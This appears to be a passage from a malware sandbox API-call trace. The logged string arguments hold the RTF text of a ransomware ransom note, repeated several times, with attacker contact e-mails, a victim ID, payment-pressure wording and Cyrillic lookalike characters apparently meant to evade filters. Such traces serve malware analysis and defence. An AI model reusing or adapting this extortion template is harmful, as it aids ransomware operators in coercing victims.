\\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.005] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st 